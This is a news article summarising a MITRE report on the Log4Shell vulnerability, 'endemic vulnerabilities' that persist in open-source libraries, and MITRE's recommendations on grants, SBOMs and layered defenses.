New MITRE report focuses on ​​Log4Shell, endemic vulnerabilities in open-source libraries

MITRE has released a report highlighting the issues open-source software libraries face in fixing vulnerabilities, following the handling of the Log4j vulnerabilities series last December. The exploitation led to many frantic weeks as cybersecurity researchers and defenders sought to stem attacks using the vulnerabilities. The report also details ‘endemic vulnerabilities’ to describe the situation where the exposures continue to be found and exploited across connected environments within old and new software products long after it has been identified and patches made available.

The MITRE report evaluates the magnitude of the exploit’s impact on numerous software products and projects. The number of impacted products, coupled with challenges in applying fixes, played a role in the Log4j vulnerability remaining in the global software ecosystem for a long time. It also calls upon stakeholders across the public and private sectors to address the exposures with endemic risks.

The use of ​​open-source software libraries helps accelerates development, increases standardization, and allows software developers to leverage the expertise of other specialists that they might not otherwise be able to access, MITRE said in its latest report. “However, when one of these widely used code libraries has an exploitable vulnerability, the security implications can be wide-reaching and long-lived. In particular, such vulnerabilities have a high probability of becoming endemic,” it added.

MITRE operates as a not-for-profit concern and works in the public interest across federal, state and local governments, industry, and academia. It delivers ideas across various areas, including artificial intelligence, intuitive data science, quantum information science, health informatics, space security, policy, and economic expertise, trustworthy autonomy, cyber threat sharing, and cyber resilience.

MITRE interprets endemic vulnerabilities as those that persist in the global software ecosystem long after identifying and publishing fixes. Vulnerable open-source software libraries are particularly susceptible to creating endemic vulnerabilities because it can be harder to identify vulnerable products that incorporate them and harder to patch products even when they are known to be vulnerable. As a result, these exposures can still appear in new products months and years after non-vulnerable versions of the relevant library are available. 

The report added that the recent Log4shell vulnerability is an excellent example of why such vulnerabilities can have such longevity. Last December, an Alibaba security researcher discovered that Log4j’s JNDI functionality was vulnerable to exploitation and reported the exploitation to the Apache Software Foundation (ASF)’s Log4j developer team, which quickly led to the Log4j developers releasing updates mitigating the Log4shell vulnerability and several related security vulnerabilities. 

However, efforts by Google, the U.S. Cybersecurity and Infrastructure Security Agency (CISA), and other researchers have uncovered potentially thousands of impacted applications across the open-source community, commercial software industry, and product vendors of the internet of things (IoT), industrial, and operation technologies (OT), MITRE said in its report. “A race soon ensued, with software developers, vendors, IT administrators, and network defenders scrambling to apply updates and respond to intrusions on the one side, and a broad range of adversaries, including pranksters, financially motivated criminals, and suspected state-sponsored actors, on the other,” it added.

The MITRE report said that containing the Log4shell vulnerability is quite challenging and that the patches that the ASF developed only addressed the Log4j library. The open-source, commercial and in-house software applications that use Log4j require their security updates to address the vulnerability. Enterprises and users must then install released patches, it added. 

Unfortunately, the breadth of Log4j’s deployment across so many applications throughout the internet – many of which may be abandoned by their developers, unmanaged by their users, or cannot simply be patched – guarantees that Log4shell will remain an endemic vulnerability and pose continuing risk to internet users for years to come, the report added.

Endemic vulnerabilities are now a fact of life in the global software ecosystem. The presence of known but unpatched exposures provides ‘plentiful fodder’ for malicious hackers, who often create collections of compromised machines to support distributed denial-of-service (DDoS) or other attacks on various targets. 

The MITRE report said that endemic vulnerabilities can also persist when careless developers use old, vulnerable software libraries in new products. Today’s IT enterprises need to operate in a world where endemic vulnerabilities can create threats inside and outside their networks. While little can be done to eliminate vulnerable software globally, there are steps that can help reduce new vulnerabilities and help enterprises be more resilient in the face of endemic vulnerabilities. 

To address these challenges of endemic vulnerabilities, MITRE calls upon the U.S. government to identify and provide resources to improve critical open-source software technology through accessible grant programs that focus on security through collaboration and cooperation with open source software projects. 

The MITRE report also asked the software industry and companies procuring software-based solutions to adopt technologies such as the Software Bill of Materials (SBOMs). The move will help improve the transparency of what software libraries their products use and depend upon, allowing developers and users to identify and respond to vulnerabilities in underlying software components. 

It also asked IT enterprises to harden their networks with layered defenses and adopt an ‘assume breach’ mentality. These actions should include outbound network filtering, micro-segmentation strategies derived from zero trust architectures, improved monitoring, and the exercising of vulnerability and incident response procedures. 

“These actions will not eliminate the threat posed by endemic vulnerabilities like log4shell – no one has the power to do that – but they can reduce the frequency of such vulnerabilities and enable a more effective response to vulnerabilities that do arise,” the MITRE report concluded.

Anna Ribeiro

Industrial Cyber News Editor. Anna Ribeiro is a freelance journalist with over 14 years of experience in the areas of security, data storage, virtualization and IoT.